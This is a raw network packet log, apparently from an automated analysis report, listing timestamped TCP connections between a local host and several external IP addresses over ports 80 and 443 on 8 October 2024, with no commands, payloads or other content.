                                                                                                                                      Oct 8, 2024 03:14:56.181318045 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.181381941 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.181437969 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.181593895 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.181658983 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.181855917 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.181915045 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.182028055 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.182090998 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.182403088 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.182465076 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.182724953 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.182785988 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.185647011 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.185729980 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.185995102 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.186183929 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.186270952 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.186335087 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.186554909 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.186623096 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.186754942 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.186825037 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.187011003 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.187073946 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.206231117 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.206439018 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.249998093 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.250091076 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.267138958 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.267330885 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.267364979 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.267435074 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.267508984 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.267513037 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.267570972 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.267587900 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.267816067 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.267996073 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.268004894 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.268064022 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.268109083 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.268244028 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.268302917 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.268318892 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.268460035 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.268521070 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.268532038 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.268636942 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.268693924 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.268704891 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.268862009 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.268918991 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.268932104 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.269480944 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.269541025 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.269553900 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.269778013 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.269836903 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.269846916 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270039082 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270101070 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.270112038 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270226955 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270284891 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.270298004 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270570040 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270637989 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.270648956 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270725965 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270773888 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.270785093 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270802975 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.270844936 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.272799015 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.272833109 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.272859097 CEST49762443192.168.2.423.145.40.164
                                                                                                                                      Oct 8, 2024 03:14:56.272872925 CEST4434976223.145.40.164192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.379113913 CEST4977380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:56.384289026 CEST8049773180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.384377003 CEST4977380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:56.384501934 CEST4977380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:56.384537935 CEST4977380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:56.389436960 CEST8049773180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:56.389467955 CEST8049773180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:57.757764101 CEST8049773180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:57.757874012 CEST8049773180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:57.758027077 CEST4977380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:57.758110046 CEST4977380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:57.760785103 CEST4978480192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:57.763063908 CEST8049773180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:57.765732050 CEST8049784180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:57.765804052 CEST4978480192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:57.765925884 CEST4978480192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:57.765960932 CEST4978480192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:57.770802021 CEST8049784180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:57.770831108 CEST8049784180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.141500950 CEST8049784180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.141537905 CEST8049784180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.141611099 CEST4978480192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.141733885 CEST4978480192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.143938065 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.146562099 CEST8049784180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.148797035 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.148865938 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.148987055 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.149019957 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:59.153898001 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:59.153947115 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.543446064 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.543540955 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.543732882 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.543823004 CEST4979580192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.545702934 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.548861027 CEST8049795180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.550878048 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.550945044 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.551059008 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.551074982 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:00.556107044 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:00.556133986 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.942102909 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.943020105 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.943078995 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.945344925 CEST4980380192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.950215101 CEST8049803180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.950754881 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.957201004 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.957259893 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.957376957 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.957405090 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:01.962224960 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:01.962354898 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.346745014 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.347078085 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.347157955 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.347276926 CEST4981280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.349416018 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.352575064 CEST8049812180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.354393959 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.354494095 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.354633093 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.354633093 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:03.361694098 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:03.361721039 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.734694958 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.734750986 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.734946012 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.735063076 CEST4982280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.737210989 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.739859104 CEST8049822180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.742156029 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.742368937 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.742368937 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.742368937 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:04.747371912 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:04.747493982 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.121746063 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.121970892 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.122206926 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.122206926 CEST4983180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.125716925 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.127238989 CEST8049831180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.130673885 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.130877018 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.130975008 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.130975008 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:06.136018991 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:06.136045933 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:07.506372929 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:07.506428003 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:07.506496906 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:07.506592989 CEST4984180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:15:07.511534929 CEST8049841180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:18.583092928 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:18.583118916 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:18.583175898 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:18.583394051 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:18.583398104 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.196371078 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.196430922 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.203792095 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.203795910 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.204518080 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.207155943 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.207202911 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.207207918 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.556767941 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.556828022 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.556886911 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.556901932 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.602463007 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.602473021 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.644282103 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.644392014 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.644402981 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645226002 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645260096 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645296097 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.645303011 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645312071 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.645317078 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.645339012 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.681180954 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.681269884 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.681278944 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.681286097 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.681332111 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.681339025 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.681711912 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.712778091 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.712810040 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.712867975 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.712919950 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.712927103 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.731705904 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.731739044 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.731789112 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.731801987 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.731832981 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.732644081 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.732711077 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.732748032 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.732757092 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.732775927 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.734019041 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.734086037 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.734093904 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.743705034 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.743782043 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.743791103 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.768709898 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.768799067 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.768809080 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.782097101 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.782129049 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.782188892 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.782198906 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.782237053 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.782242060 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.782279015 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.782286882 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.800384045 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.800445080 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.800460100 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.800471067 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.800498009 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.801064968 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.801111937 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.801132917 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.801142931 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.801153898 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.819657087 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.819742918 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.819751978 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.820736885 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.820787907 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.820804119 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.820811033 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.820832968 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.821614027 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.821683884 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.821691990 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.830743074 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.830836058 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.830847979 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.831655979 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.831742048 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.831748962 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.832283020 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.832348108 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.832355022 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.856534958 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.856726885 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.856736898 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.856765032 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.856825113 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.856831074 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.856837034 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.856874943 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.856884003 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.857534885 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.857539892 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.869776011 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.869935989 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.869954109 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.870037079 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.870100975 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.870107889 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.889597893 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.889684916 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.889693022 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.889813900 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.889950037 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.889972925 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.889980078 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.890019894 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.890038013 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.890058994 CEST4434991523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:19.890094042 CEST49915443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:19.908730030 CEST4434991523.145.40.168192.168.2.4
